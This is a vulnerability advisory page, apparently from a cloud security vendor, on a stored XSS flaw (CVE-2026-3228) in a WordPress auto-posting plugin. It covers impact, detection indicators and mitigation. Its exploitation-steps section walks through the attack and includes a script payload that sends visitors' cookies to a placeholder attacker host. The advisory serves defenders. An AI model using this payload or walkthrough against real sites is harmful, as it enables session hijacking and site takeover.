CVE-2026-3228: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-3228 is a Stored Cross-Site Scripting (XSS) vulnerability in the NextScripts: Social Networks Auto-Poster plugin for WordPress, affecting all versions up to and including 4.4.6. The flaw allows authenticated attackers with Contributor-level access or higher to inject arbitrary web scripts via the [nxs_fbembed] shortcode, which are then executed in the browsers of any user who visits the affected page. It was published on March 10, 2026, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is insufficient input sanitization and output escaping on the snapFB post meta value processed by the [nxs_fbembed] shortcode, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). An authenticated attacker with at minimum Contributor-level WordPress access can set a malicious value in the snapFB post meta field; when the shortcode renders on a page, the unsanitized value is written directly into the HTML output without escaping, enabling script injection. The vulnerable code path is located in inc-cl/fb.php at line 581 of the plugin (Wordfence, WordPress Trac). A public Python-based PoC exploit automating the full attack chain is available on GitHub (PoC GitHub).

Impact

Successful exploitation allows injected scripts to execute in the browsers of all users — including administrators — who visit the compromised page, impacting both confidentiality (e.g., session cookie theft) and integrity (e.g., unauthorized content modification or admin account creation). Because the payload is stored server-side, every page view triggers execution without further attacker interaction, maximizing the blast radius. The scope is changed (S:C in CVSS), meaning the impact extends beyond the plugin itself to the broader WordPress site and its visitors (Wordfence, Red Hat CVE).

Exploitability

A fully functional Python PoC exploit was published on GitHub on March 11, 2026, automating authentication, payload injection, session cookie theft, and attempted admin account creation (PoC GitHub). The EPSS score is approximately 0.03%, indicating low but non-zero probability of exploitation in the wild, and there is no current evidence of active in-the-wild exploitation or CISA KEV catalog listing (Red Hat CVE). Exploitation requires only Contributor-level WordPress credentials, which lowers the barrier significantly on sites with open or loosely managed contributor registration.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the NextScripts: Social Networks Auto-Poster plugin version ≤ 4.4.6 using tools like WPScan or by checking /wp-content/plugins/social-networks-auto-poster-facebook-twitter-g/readme.txt.
  2. Obtain Contributor credentials: Register or obtain a Contributor-level (or higher) account on the target WordPress site.
  3. Create or edit a post: Log in and create a new post (or edit an existing one) that will use the [nxs_fbembed] shortcode.
  4. Inject malicious payload: Set the snapFB post meta value to a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) via the post editor's custom fields or directly via the WordPress REST API/admin interface.
  5. Publish the post: Publish or update the post so the shortcode renders the injected value on the page.
  6. Trigger execution: When any user (including administrators) visits the page containing [nxs_fbembed], the injected script executes in their browser, enabling cookie theft, session hijacking, or admin account creation.
  7. Post-exploitation: Use the stolen admin session cookie or newly created admin account to take full control of the WordPress site (PoC GitHub, Wordfence).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or the REST API (/wp-json/wp/v2/posts) from Contributor-level accounts containing script tags or encoded JavaScript in the snapFB meta field.
  • File System: Unexpected modifications to post meta values in the WordPress database (wp_postmeta table) where meta_key = 'snapFB' contains <script>, javascript:, or encoded variants.
  • Network: Outbound HTTP requests from victim browsers to unknown external domains immediately after visiting pages with the [nxs_fbembed] shortcode, potentially carrying cookie or session data in query parameters.
  • Process/Application: New WordPress administrator accounts created without corresponding legitimate user registration activity, particularly shortly after a Contributor-level user published or edited posts.
  • Browser/Client: Unexpected redirects or pop-ups on pages containing the [nxs_fbembed] shortcode reported by site visitors or administrators (PoC GitHub).

Mitigation and workarounds

Update the NextScripts: Social Networks Auto-Poster plugin to a version newer than 4.4.6, which includes the fix applied in the changeset to inc-cl/fb.php (WordPress Trac Changeset). If an immediate update is not possible, restrict Contributor-level and above access to only fully trusted users, and consider disabling the [nxs_fbembed] shortcode functionality. Deploying a Web Application Firewall (WAF) with rules to detect and block script injection in post meta fields provides an additional layer of defense (Wordfence).

Community reactions

Wordfence included CVE-2026-3228 in their weekly WordPress vulnerability report for March 9–15, 2026, highlighting it as part of a broader set of plugin vulnerabilities tracked that week (Wordfence Blog). Check Point also published a defense advisory referencing the vulnerability (Check Point Advisory). Community reaction has been moderate, consistent with a medium-severity plugin vulnerability requiring authenticated access.

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management